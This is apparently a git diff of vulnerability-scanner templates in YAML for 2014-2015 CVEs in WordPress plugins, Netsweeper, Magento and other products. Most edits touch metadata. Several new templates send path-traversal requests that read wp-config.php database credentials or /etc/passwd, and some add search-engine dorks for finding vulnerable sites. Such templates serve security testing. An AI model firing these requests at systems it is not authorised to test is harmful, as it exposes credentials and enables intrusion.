+++ b/cves/2014/CVE-2014-9094.yaml
@@ -1,15 +1,20 @@
id: CVE-2014-9094
info:
- name: WordPress DZS-VideoGallery Plugin Reflected Cross-Site Scripting
+ name: WordPress DZS-VideoGallery Plugin Cross-Site Scripting
author: daffainfo
severity: medium
description: Multiple cross-site scripting vulnerabilities in deploy/designer/preview.php in the Digital Zoom Studio (DZS) Video Gallery plugin for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) swfloc or (2) designrand parameter.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2014-9094
+ - http://websecurity.com.ua/7152/
+ - http://seclists.org/fulldisclosure/2014/Jul/65
+ - http://web.archive.org/web/20210615134835/https://www.securityfocus.com/bid/68525
classification:
cve-id: CVE-2014-9094
- tags: cve,cve2014,wordpress,xss,wp-plugin
+ metadata:
+ google-query: inurl:"/wp-content/plugins/dzs-videogallery"
+ tags: cve2014,wordpress,xss,wp-plugin,seclists,cve
requests:
- method: GET
diff --git a/cves/2014/CVE-2014-9119.yaml b/cves/2014/CVE-2014-9119.yaml
new file mode 100644
index 0000000000..eea1760029
--- /dev/null
+++ b/cves/2014/CVE-2014-9119.yaml
@@ -0,0 +1,39 @@
+id: CVE-2014-9119
+
+info:
+ name: WordPress DB Backup <=4.5 - Local File Inclusion
+ author: dhiyaneshDK
+ severity: high
+ description: |
+ WordPress Plugin DB Backup 4.5 and possibly prior versions are prone to a local file inclusion vulnerability because they fail to sufficiently sanitize user-supplied input. Exploiting this issue can allow an attacker to obtain sensitive information that could aid in further attacks.
+ reference:
+ - https://wpscan.com/vulnerability/d3f1e51e-5f44-4a15-97bc-5eefc3e77536
+ - https://www.exploit-db.com/exploits/35378
+ - https://nvd.nist.gov/vuln/detail/CVE-2014-9119
+ - https://wpvulndb.com/vulnerabilities/7726
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.5
+ cve-id: CVE-2014-9119
+ cwe-id: CWE-22
+ tags: lfi,cve,cve2014,wordpress,wp-plugin,wp,backup,wpscan,edb
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-content/plugins/db-backup/download.php?file=../../../wp-config.php'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "DB_NAME"
+ - "DB_PASSWORD"
+ condition: and
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/08/05
diff --git a/cves/2014/CVE-2014-9444.yaml b/cves/2014/CVE-2014-9444.yaml
index deab40780a..948b7d93e2 100644
--- a/cves/2014/CVE-2014-9444.yaml
+++ b/cves/2014/CVE-2014-9444.yaml
@@ -1,16 +1,18 @@
id: CVE-2014-9444
info:
- name: Frontend Uploader <= 0.9.2 - Unauthenticated Cross-Site Scripting
+ name: Frontend Uploader <= 0.9.2 - Cross-Site Scripting
author: daffainfo
severity: medium
description: The Frontend Uploader WordPress plugin prior to v.0.9.2 was affected by an unauthenticated Cross-Site Scripting security vulnerability.
reference:
- https://wpscan.com/vulnerability/f0739b1e-22dc-4ca6-ad83-a0e80228e3c7
- https://nvd.nist.gov/vuln/detail/CVE-2014-9444
+ - http://packetstormsecurity.com/files/129749/WordPress-Frontend-Uploader-0.9.2-Cross-Site-Scripting.html
+ - http://web.archive.org/web/20210122092924/https://www.securityfocus.com/bid/71808/
classification:
cve-id: CVE-2014-9444
- tags: cve,cve2014,wordpress,wp-plugin,xss
+ tags: wp-plugin,xss,wpscan,packetstorm,cve,cve2014,wordpress,unauth
requests:
- method: GET
diff --git a/cves/2014/CVE-2014-9606.yaml b/cves/2014/CVE-2014-9606.yaml
index db4a35b332..615077835d 100644
--- a/cves/2014/CVE-2014-9606.yaml
+++ b/cves/2014/CVE-2014-9606.yaml
@@ -4,18 +4,17 @@ info:
name: Netsweeper 4.0.8 - Cross-Site Scripting
author: daffainfo
severity: medium
- description: Multiple cross-site scripting vulnerabilities in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allow remote attackers to inject arbitrary web script or HTML via the (1) server
- parameter to remotereporter/load_logfiles.php, (2) customctid parameter to webadmin/policy/category_table_ajax.php, (3) urllist parameter to webadmin/alert/alert.php, (4) QUERY_STRING to webadmin/ajaxfilemanager/ajax_get_file_listing.php,
- or (5) PATH_INFO to webadmin/policy/policy_table_ajax.php/.
+ description: Multiple cross-site scripting vulnerabilities in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allow remote attackers to inject arbitrary web script or HTML via the (1) server parameter to remotereporter/load_logfiles.php, (2) customctid parameter to webadmin/policy/category_table_ajax.php, (3) urllist parameter to webadmin/alert/alert.php, (4) QUERY_STRING to webadmin/ajaxfilemanager/ajax_get_file_listing.php, or (5) PATH_INFO to webadmin/policy/policy_table_ajax.php/.
reference:
- https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz
- https://nvd.nist.gov/vuln/detail/CVE-2014-9606
+ - http://packetstormsecurity.com/files/133034/Netsweeper-Bypass-XSS-Redirection-SQL-Injection-Execution.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2014-9606
cwe-id: CWE-79
- tags: cve,cve2014,netsweeper,xss
+ tags: cve2014,netsweeper,xss,packetstorm,cve
requests:
- method: GET
diff --git a/cves/2014/CVE-2014-9607.yaml b/cves/2014/CVE-2014-9607.yaml
index 7913450fef..676c2def0f 100644
--- a/cves/2014/CVE-2014-9607.yaml
+++ b/cves/2014/CVE-2014-9607.yaml
@@ -8,12 +8,13 @@ info:
reference:
- https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz
- https://nvd.nist.gov/vuln/detail/CVE-2014-9607
+ - http://packetstormsecurity.com/files/133034/Netsweeper-Bypass-XSS-Redirection-SQL-Injection-Execution.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2014-9607
cwe-id: CWE-79
- tags: cve,cve2014,netsweeper,xss
+ tags: packetstorm,cve,cve2014,netsweeper,xss
requests:
- method: GET
diff --git a/cves/2014/CVE-2014-9608.yaml b/cves/2014/CVE-2014-9608.yaml
index f74ea0e5e3..b7bce998a1 100644
--- a/cves/2014/CVE-2014-9608.yaml
+++ b/cves/2014/CVE-2014-9608.yaml
@@ -8,12 +8,13 @@ info:
reference:
- https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz
- https://nvd.nist.gov/vuln/detail/CVE-2014-9608
+ - http://packetstormsecurity.com/files/133034/Netsweeper-Bypass-XSS-Redirection-SQL-Injection-Execution.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2014-9608
cwe-id: CWE-79
- tags: cve,cve2014,netsweeper,xss
+ tags: cve,cve2014,netsweeper,xss,packetstorm
requests:
- method: GET
diff --git a/cves/2014/CVE-2014-9609.yaml b/cves/2014/CVE-2014-9609.yaml
index d60e570b1a..a3be2897e2 100644
--- a/cves/2014/CVE-2014-9609.yaml
+++ b/cves/2014/CVE-2014-9609.yaml
@@ -8,12 +8,13 @@ info:
reference:
- https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz
- https://nvd.nist.gov/vuln/detail/CVE-2014-9609
+ - http://packetstormsecurity.com/files/133034/Netsweeper-Bypass-XSS-Redirection-SQL-Injection-Execution.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2014-9609
cwe-id: CWE-22
- tags: cve,cve2014,netsweeper,lfi
+ tags: cve2014,netsweeper,lfi,packetstorm,cve
requests:
- method: GET
diff --git a/cves/2014/CVE-2014-9614.yaml b/cves/2014/CVE-2014-9614.yaml
index 264c7870d3..0936e0766c 100644
--- a/cves/2014/CVE-2014-9614.yaml
+++ b/cves/2014/CVE-2014-9614.yaml
@@ -8,12 +8,13 @@ info:
reference:
- https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz
- https://nvd.nist.gov/vuln/detail/CVE-2014-9614
+ - http://packetstormsecurity.com/files/133034/Netsweeper-Bypass-XSS-Redirection-SQL-Injection-Execution.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2014-9614
cwe-id: CWE-798
- tags: cve,cve2021,netsweeper,default-login
+ tags: cve,cve2014,netsweeper,default-login,packetstorm
requests:
- raw:
diff --git a/cves/2014/CVE-2014-9615.yaml b/cves/2014/CVE-2014-9615.yaml
index 1cf501ffc1..f787e8a2b6 100644
--- a/cves/2014/CVE-2014-9615.yaml
+++ b/cves/2014/CVE-2014-9615.yaml
@@ -8,12 +8,13 @@ info:
reference:
- https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz
- https://nvd.nist.gov/vuln/detail/CVE-2014-9615
+ - http://packetstormsecurity.com/files/133034/Netsweeper-Bypass-XSS-Redirection-SQL-Injection-Execution.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2014-9615
cwe-id: CWE-79
- tags: cve,cve2014,netsweeper,xss
+ tags: cve,cve2014,netsweeper,xss,packetstorm
requests:
- method: GET
diff --git a/cves/2014/CVE-2014-9617.yaml b/cves/2014/CVE-2014-9617.yaml
index fadd68557c..f5ce9ecdde 100644
--- a/cves/2014/CVE-2014-9617.yaml
+++ b/cves/2014/CVE-2014-9617.yaml
@@ -8,22 +8,23 @@ info:
reference:
- https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz
- https://nvd.nist.gov/vuln/detail/CVE-2014-9617
+ - http://packetstormsecurity.com/files/133034/Netsweeper-Bypass-XSS-Redirection-SQL-Injection-Execution.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2014-9617
cwe-id: CWE-601
- tags: cve,cve2014,netsweeper,redirect
+ tags: cve,cve2014,netsweeper,redirect,packetstorm
requests:
- method: GET
path:
- - "{{BaseURL}}/remotereporter/load_logfiles.php?server=127.0.0.1&url=https://example.com/"
+ - "{{BaseURL}}/remotereporter/load_logfiles.php?server=127.0.0.1&url=https://interact.sh/"
matchers:
- type: regex
part: header
regex:
- - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
+ - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
# Enhanced by mp on 2022/02/25
diff --git a/cves/2014/CVE-2014-9618.yaml b/cves/2014/CVE-2014-9618.yaml
index 5dc89cf317..7ae682bc94 100644
--- a/cves/2014/CVE-2014-9618.yaml
+++ b/cves/2014/CVE-2014-9618.yaml
@@ -9,12 +9,14 @@ info:
reference:
- https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz
- https://nvd.nist.gov/vuln/detail/CVE-2014-9618
+ - https://www.exploit-db.com/exploits/37933/
+ - http://packetstormsecurity.com/files/133034/Netsweeper-Bypass-XSS-Redirection-SQL-Injection-Execution.html
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2014-9618
cwe-id: CWE-287
- tags: cve,cve2014,netsweeper,auth-bypass
+ tags: cve2014,netsweeper,auth-bypass,packetstorm,edb,cve
requests:
- method: GET
diff --git a/cves/2015/CVE-2015-0554.yaml b/cves/2015/CVE-2015-0554.yaml
index 7c0b5ddbbe..4689e2f4d3 100644
--- a/cves/2015/CVE-2015-0554.yaml
+++ b/cves/2015/CVE-2015-0554.yaml
@@ -1,16 +1,18 @@
id: CVE-2015-0554
info:
- name: Pirelli ADSL2/2+ Wireless Router P.DGA4001N - Information Disclosure
+ name: ADB/Pirelli ADSL2/2+ Wireless Router P.DGA4001N - Information Disclosure
author: daffainfo
severity: high
- description: The ADB (formerly Pirelli Broadband Solutions) P.DGA4001N router with firmware PDG_TEF_SP_4.06L.6 does not properly restrict access to the web interface, which allows remote attackers to obtain sensitive information or cause a denial of service (device restart) as demonstrated by a direct request to (1) wlsecurity.html or (2) resetrouter.html.
+ description: ADB (formerly Pirelli Broadband Solutions) P.DGA4001N router with firmware PDG_TEF_SP_4.06L.6 does not properly restrict access to the web interface, which allows remote attackers to obtain sensitive information or cause a denial of service (device restart) as demonstrated by a direct request to (1) wlsecurity.html or (2) resetrouter.html.
reference:
- https://www.exploit-db.com/exploits/35721
+ - http://packetstormsecurity.com/files/129828/Pirelli-ADSL2-2-Wireless-Router-P.DGA4001N-Information-Disclosure.html
- https://nvd.nist.gov/vuln/detail/CVE-2015-0554
+ - http://www.exploit-db.com/exploits/35721
classification:
cve-id: CVE-2015-0554
- tags: cve,cve2015,pirelli,router,disclosure
+ tags: pirelli,router,disclosure,edb,packetstorm,cve,cve2015
requests:
- method: GET
@@ -30,3 +32,5 @@ requests:
- type: status
status:
- 200
+
+# Enhanced by mp on 2022/06/08
diff --git a/vulnerabilities/wordpress/candidate-application-lfi.yaml b/cves/2015/CVE-2015-1000005.yaml
similarity index 56%
rename from vulnerabilities/wordpress/candidate-application-lfi.yaml
rename to cves/2015/CVE-2015-1000005.yaml
index cdc97aa53a..d3f55c2a08 100644
--- a/vulnerabilities/wordpress/candidate-application-lfi.yaml
+++ b/cves/2015/CVE-2015-1000005.yaml
@@ -1,17 +1,21 @@
-id: candidate-application-lfi
+id: CVE-2015-1000005
info:
name: WordPress Candidate Application Form <= 1.3 - Local File Inclusion
author: dhiyaneshDK
severity: high
- description: WordPress Candidate Application Form <= 1.3 is susceptible to arbitrary file downloads because the code in downloadpdffile.php does not do any sanity checks.
+ description: |
+ WordPress Candidate Application Form <= 1.3 is susceptible to arbitrary file downloads because the code in downloadpdffile.php does not do any sanity checks.
reference:
- https://wpscan.com/vulnerability/446233e9-33b3-4024-9b7d-63f9bb1dafe0
+ - https://nvd.nist.gov/vuln/detail/CVE-2015-1000005
+ - http://www.vapidlabs.com/advisory.php?v=142
classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
- cvss-score: 8.6
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.5
+ cve-id: CVE-2015-1000005
cwe-id: CWE-22
- tags: wordpress,wp-plugin,lfi,wp
+ tags: wpscan,cve,cve2015,wordpress,wp-plugin,lfi,wp
requests:
- method: GET
diff --git a/cves/2015/CVE-2015-1000010.yaml b/cves/2015/CVE-2015-1000010.yaml
new file mode 100644
index 0000000000..20be79142a
--- /dev/null
+++ b/cves/2015/CVE-2015-1000010.yaml
@@ -0,0 +1,36 @@
+id: CVE-2015-1000010
+
+info:
+ name: WordPress Simple Image Manipulator < 1.0 - Local File Inclusion
+ author: dhiyaneshDK
+ severity: high
+ description: |
+ WordPress Simple Image Manipulator 1.0 is vulnerable to local file inclusion in ./simple-image-manipulator/controller/download.php because no checks are made to authenticate users or sanitize input when determining file location.
+ reference:
+ - https://packetstormsecurity.com/files/132962/WordPress-Simple-Image-Manipulator-1.0-File-Download.html
+ - https://wpscan.com/vulnerability/40e84e85-7176-4552-b021-6963d0396543
+ - https://nvd.nist.gov/vuln/detail/CVE-2015-1000010
+ - http://www.vapidlabs.com/advisory.php?v=147
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.5
+ cve-id: CVE-2015-1000010
+ cwe-id: CWE-22
+ tags: packetstorm,wpscan,cve,cve2015,wordpress,wp-plugin,lfi,wp
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd'
+
+ matchers-condition: and
+ matchers:
+ - type: regex
+ regex:
+ - "root:[x*]:0:0"
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/07/29
diff --git a/cves/2015/CVE-2015-1000012.yaml b/cves/2015/CVE-2015-1000012.yaml
index 8205281fcf..a50788f1cd 100644
--- a/cves/2015/CVE-2015-1000012.yaml
+++ b/cves/2015/CVE-2015-1000012.yaml
@@ -1,19 +1,24 @@
id: CVE-2015-1000012
info:
- name: MyPixs <= 0.3 - Unauthenticated Local File Inclusion (LFI)
+ name: WordPress MyPixs <=0.3 - Local File Inclusion
author: daffainfo
severity: high
- description: Local File Inclusion Vulnerability in mypixs v0.3 wordpress plugin
+ description: WordPress MyPixs 0.3 and prior contains a local file inclusion vulnerability.
reference:
- https://wpscan.com/vulnerability/24b83ce5-e3b8-4262-b087-a2dfec014985
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1000012
+ - http://www.vapidlabs.com/advisory.php?v=154
+ - https://nvd.nist.gov/vuln/detail/CVE-2015-1000012
+ - http://web.archive.org/web/20210518144916/https://www.securityfocus.com/bid/94495
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2015-1000012
cwe-id: CWE-200
- tags: cve,cve2015,wordpress,wp-plugin,lfi
+ metadata:
+ google-query: inurl:"/wp-content/plugins/mypixs"
+ tags: cve2015,wordpress,wp-plugin,lfi,wpscan,cve
requests:
- method: GET
@@ -29,3 +34,5 @@ requests:
- type: status
status:
- 200
+
+# Enhanced by mp on 2022/06/06
diff --git a/cves/2015/CVE-2015-1427.yaml b/cves/2015/CVE-2015-1427.yaml
index 027ca9e210..2e3ed8377f 100644
--- a/cves/2015/CVE-2015-1427.yaml
+++ b/cves/2015/CVE-2015-1427.yaml
@@ -9,9 +9,10 @@ info:
- https://blog.csdn.net/JiangBuLiu/article/details/94457980
- http://www.elasticsearch.com/blog/elasticsearch-1-4-3-1-3-8-released/
- https://nvd.nist.gov/vuln/detail/CVE-2015-1427
+ - http://web.archive.org/web/20210506011817/https://www.securityfocus.com/bid/72585
classification:
cve-id: CVE-2015-1427
- tags: cve,cve2015,elastic,rce,elasticsearch
+ tags: cve,cve2015,elastic,rce,elasticsearch,kev
requests:
- raw:
diff --git a/cves/2015/CVE-2015-1503.yaml b/cves/2015/CVE-2015-1503.yaml
index 2b30a3db9b..70821ebe5e 100644
--- a/cves/2015/CVE-2015-1503.yaml
+++ b/cves/2015/CVE-2015-1503.yaml
@@ -1,7 +1,7 @@
id: CVE-2015-1503
info:
- name: IceWarp Mail Server Directory Traversal
+ name: IceWarp Mail Server <11.1.1 - Directory Traversal
author: 0x_Akoko
severity: high
description: IceWarp Mail Server versions prior to 11.1.1 suffer from a directory traversal vulnerability.
@@ -9,12 +9,15 @@ info:
- https://packetstormsecurity.com/files/147505/IceWarp-Mail-Server-Directory-Traversal.html
- http://www.icewarp.com
- https://nvd.nist.gov/vuln/detail/CVE-2015-1503
+ - https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-001/?fid=5614
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2015-1503
cwe-id: CWE-200
- tags: cve,cve2015,icewarp,lfi,mail
+ metadata:
+ shodan-query: title:"icewarp"
+ tags: lfi,mail,packetstorm,cve,cve2015,icewarp
requests:
- method: GET
@@ -32,3 +35,5 @@ requests:
- type: status
status:
- 200
+
+# Enhanced by mp on 2022/06/06
diff --git a/cves/2015/CVE-2015-1579.yaml b/cves/2015/CVE-2015-1579.yaml
new file mode 100644
index 0000000000..bf648b2a35
--- /dev/null
+++ b/cves/2015/CVE-2015-1579.yaml
@@ -0,0 +1,44 @@
+id: CVE-2015-1579
+
+info:
+ name: WordPress Slider Revolution - Local File Disclosure
+ author: pussycat0x
+ severity: high
+ description: |
+ Directory traversal vulnerability in the Elegant Themes Divi theme for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the img parameter in a revslider_show_image action to wp-admin/admin-ajax.php. NOTE: this vulnerability may be a duplicate of CVE-2014-9734.
+ reference:
+ - https://blog.sucuri.net/2014/09/slider-revolution-plugin-critical-vulnerability-being-exploited.html
+ - https://cxsecurity.com/issue/WLB-2021090129
+ - https://wpscan.com/vulnerability/4b077805-5dc0-4172-970e-cc3d67964f80
+ - https://nvd.nist.gov/vuln/detail/CVE-2015-1579
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.5
+ cve-id: CVE-2015-1579
+ cwe-id: CWE-22
+ metadata:
+ google-query: inurl:/wp-content/plugins/revslider
+ tags: wordpress,wp-plugin,lfi,revslider,wp,wpscan,cve,cve2015
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php'
+ - '{{BaseURL}}/blog/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php'
+
+ stop-at-first-match: true
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "'DB_NAME'"
+ - "'DB_PASSWORD'"
+ - "'DB_USER'"
+ condition: and
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/07/29
diff --git a/cves/2015/CVE-2015-1880.yaml b/cves/2015/CVE-2015-1880.yaml
index 1eadd4aba0..526e4ddfeb 100644
--- a/cves/2015/CVE-2015-1880.yaml
+++ b/cves/2015/CVE-2015-1880.yaml
@@ -1,13 +1,15 @@
id: CVE-2015-1880
info:
- name: XSS in Fortigates SSL VPN login page
+ name: Fortinet FortiOS <=5.2.3 - Cross-Site Scripting
author: pikpikcu
severity: medium
- description: Cross-site scripting (XSS) vulnerability in the sslvpn login page in Fortinet FortiOS 5.2.x before 5.2.3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
+ description: Fortinet FortiOS 5.2.x before 5.2.3 contains a cross-site scripting vulnerability in the SSL VPN login page which allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
reference:
- - https://nvd.nist.gov/vuln/detail/CVE-2015-1880
- https://www.c2.lol/articles/xss-in-fortigates-ssl-vpn-login-page
+ - http://www.fortiguard.com/advisory/FG-IR-15-005/
+ - http://web.archive.org/web/20210122155324/https://www.securityfocus.com/bid/74652/
+ - https://nvd.nist.gov/vuln/detail/CVE-2015-1880
classification:
cve-id: CVE-2015-1880
tags: cve,cve2015,xss,fortigates,ssl
@@ -33,3 +35,5 @@ requests:
words:
- "text/html"
part: header
+
+# Enhanced by mp on 2022/08/12
diff --git a/cves/2015/CVE-2015-2067.yaml b/cves/2015/CVE-2015-2067.yaml
index f4f1cd61f9..ea3890184c 100644
--- a/cves/2015/CVE-2015-2067.yaml
+++ b/cves/2015/CVE-2015-2067.yaml
@@ -1,16 +1,19 @@
id: CVE-2015-2067
info:
- name: Magento Server Magmi Plugin - Directory Traversal
+ name: Magento Server MAGMI - Directory Traversal
author: daffainfo
severity: high
- description: Directory traversal vulnerability in web/ajax_pluginconf.php in the MAGMI (aka Magento Mass Importer) plugin for Magento Server allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
+ description: Magento Server MAGMI (aka Magento Mass Importer) contains a directory traversal vulnerability in web/ajax_pluginconf.php. that allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
reference:
- https://www.exploit-db.com/exploits/35996
- https://nvd.nist.gov/vuln/detail/CVE-2015-2067
+ - http://packetstormsecurity.com/files/130250/Magento-Server-MAGMI-Cross-Site-Scripting-Local-File-Inclusion.html
classification:
cve-id: CVE-2015-2067
- tags: cve,cve2015,lfi,magento,magmi,plugin
+ metadata:
+ shodan-query: http.component:"Magento"
+ tags: plugin,edb,packetstorm,cve,cve2015,lfi,magento,magmi
requests:
- method: GET
@@ -27,3 +30,5 @@ requests:
- type: status
status:
- 200
+
+# Enhanced by mp on 2022/06/08
diff --git a/cves/2015/CVE-2015-2068.yaml b/cves/2015/CVE-2015-2068.yaml
index 9312b6cfd1..6bf5df4e8a 100644
--- a/cves/2015/CVE-2015-2068.yaml
+++ b/cves/2015/CVE-2015-2068.yaml
@@ -1,17 +1,20 @@
id: CVE-2015-2068
info:
- name: Magento Server Magmi Plugin - Cross Site Scripting
+ name: Magento Server Mass Importer - Cross-Site Scripting
author: daffainfo
severity: medium
- description: Multiple cross-site scripting (XSS) vulnerabilities in the MAGMI (aka Magento Mass Importer) plugin for Magento Server allow remote attackers to inject arbitrary web script or HTML via the (1) profile
- parameter to web/magmi.php or (2) QUERY_STRING to web/magmi_import_run.php.
+ description: Magento Server Mass Importer plugin contains multiple cross-site scripting vulnerabilities which allow remote attackers to inject arbitrary web script or HTML via the (1) profile parameter to web/magmi.php or (2) QUERY_STRING to web/magmi_import_run.php.
reference:
- https://www.exploit-db.com/exploits/35996
+ - http://packetstormsecurity.com/files/130250/Magento-Server-MAGMI-Cross-Site-Scripting-Local-File-Inclusion.html
- https://nvd.nist.gov/vuln/detail/CVE-2015-2068
classification:
cve-id: CVE-2015-2068
- tags: cve,cve2015,magento,magmi,xss,plugin
+ metadata:
+ shodan-query: http.component:"Magento"
+ verified: "true"
+ tags: plugin,edb,packetstorm,cve,cve2015,magento,magmi,xss
requests:
- method: GET
@@ -33,3 +36,5 @@ requests:
- type: status
status:
- 200
+
+# Enhanced by mp on 2022/08/12
diff --git a/cves/2015/CVE-2015-2080.yaml b/cves/2015/CVE-2015-2080.yaml
index 41ba31406e..26e8a1b2c2 100644
--- a/cves/2015/CVE-2015-2080.yaml
+++ b/cves/2015/CVE-2015-2080.yaml
@@ -15,7 +15,7 @@ info:
cvss-score: 7.5
cve-id: CVE-2015-2080
cwe-id: CWE-200
- tags: cve,cve2015,jetty
+ tags: cve,cve2015,jetty,packetstorm
requests:
- method: POST
diff --git a/cves/2015/CVE-2015-2166.yaml b/cves/2015/CVE-2015-2166.yaml
index b055475e45..6b70de017b 100644
--- a/cves/2015/CVE-2015-2166.yaml
+++ b/cves/2015/CVE-2015-2166.yaml
@@ -1,16 +1,18 @@
id: CVE-2015-2166
info:
- name: Ericsson Drutt MSDP (Instance Monitor) Directory Traversal
+ name: Ericsson Drutt MSDP - Local File Inclusion
author: daffainfo
severity: high
- description: Directory traversal vulnerability in the Instance Monitor in Ericsson Drutt Mobile Service Delivery Platform (MSDP) 4, 5, and 6 allows remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the default URI.
+ description: Ericsson Drutt Mobile Service Delivery Platform (MSDP) 4, 5, and 6 allows remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the default URI in the Instance Monitor.
reference:
- https://www.exploit-db.com/exploits/36619
- https://nvd.nist.gov/vuln/detail/CVE-2015-2166
+ - http://packetstormsecurity.com/files/131233/Ericsson-Drutt-MSDP-Instance-Monitor-Directory-Traversal-File-Access.html
+ - http://web.archive.org/web/20210122142229/https://www.securityfocus.com/bid/73901/
classification:
cve-id: CVE-2015-2166
- tags: cve,cve2015,lfi,ericsson
+ tags: cve,cve2015,lfi,ericsson,edb,packetstorm
requests:
- method: GET
@@ -27,3 +29,5 @@ requests:
- type: status
status:
- 200
+
+# Enhanced by mp on 2022/06/08
diff --git a/cves/2015/CVE-2015-2807.yaml b/cves/2015/CVE-2015-2807.yaml
index 3c4acfcc29..ddf371a6de 100644
--- a/cves/2015/CVE-2015-2807.yaml
+++ b/cves/2015/CVE-2015-2807.yaml
@@ -1,15 +1,19 @@
id: CVE-2015-2807
info:
- name: Navis DocumentCloud 0.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)
+ name: Navis DocumentCloud <0.1.1 - Cross-Site Scripting
author: daffainfo
severity: medium
- description: Cross-site scripting (XSS) vulnerability in js/window.php in the Navis DocumentCloud plugin before 0.1.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the wpbase parameter.
+ description: Navis DocumentCloud plugin before 0.1.1 for WordPress contains a reflected cross-site scripting vulnerability in js/window.php which allows remote attackers to inject arbitrary web script or HTML via the wpbase parameter.
reference:
- https://advisories.dxw.com/advisories/publicly-exploitable-xss-in-wordpress-plugin-navis-documentcloud/
+ - https://security.dxw.com/advisories/publicly-exploitable-xss-in-wordpress-plugin-navis-documentcloud/
+ - https://wordpress.org/plugins/navis-documentcloud/changelog/
- https://nvd.nist.gov/vuln/detail/CVE-2015-2807
classification:
cve-id: CVE-2015-2807
+ metadata:
+ google-query: inurl:"/wp-content/plugins/navis-documentcloud"
tags: cve,cve2015,wordpress,wp-plugin,xss
requests:
@@ -32,3 +36,5 @@ requests:
- type: status
status:
- 200
+
+# Enhanced by mp on 2022/08/12
diff --git a/cves/2015/CVE-2015-3224.yaml b/cves/2015/CVE-2015-3224.yaml
index c8fd037c9d..34a797940a 100644
--- a/cves/2015/CVE-2015-3224.yaml
+++ b/cves/2015/CVE-2015-3224.yaml
@@ -4,7 +4,7 @@ info:
name: Ruby on Rails Web Console - Remote Code Execution
author: pdteam
severity: critical
- description: "Ruby on Rails Web Console before 2.1.3, as used with Ruby on Rails 3.x and 4.x, does not properly restrict the use of X-Forwarded-For headers in determining a client's IP address, which allows remote attackers to bypass the whitelisted_ips protection mechanism via a crafted request to request.rb."
